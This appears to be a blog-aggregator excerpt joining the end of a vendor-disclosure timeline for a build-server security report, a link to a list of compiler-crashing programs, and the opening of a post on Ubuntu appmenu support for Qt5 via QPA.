2012-11-01: Sent description of a potential attack on a build server as a counterargument for it not being a security bug.
2012-11-06: Received ACK + information that the bug will be discussed again with the product team.
2012-12-18: Received "we are still working on it".
2013-01-31: Sent a ping.
2013-06-03: Sent a ping.
2013-06-15: Received information that the bug will be considered as a reliability issue. The build server documentation is updated with a security note.
2013-06-21: Sent a heads up with this blog post.
2013-06-24: Published this blog post.


A pretty awesome blog post with a gathering of compiler crashes (thx goes to Meredith for pointing this out):
57 Small Programs that Crash Compilers

Appmenu Qt5: starting work - QPA, QPlatformThemeFactory

By sil2100 | Thu, 20 Jun 2013 01:08:00 GMT | @domain:
Things have been very busy lately, as managing the daily-release process and tools for Ubuntu proved to be more challenging than we had expected. In the meantime though, I am also working on creating proper Ubuntu appmenu support for Qt5 by the use of the Qt Platform Abstraction (QPA) API. Not a hard task, but without enough time even this can be a bit troublesome. I would like to use this post to go over some of the things that I have learned about the Qt5 QPA topic, as well as to mention some plans, concepts and remarks regarding proper Ubuntu appmenu support for Qt5, as designed by me.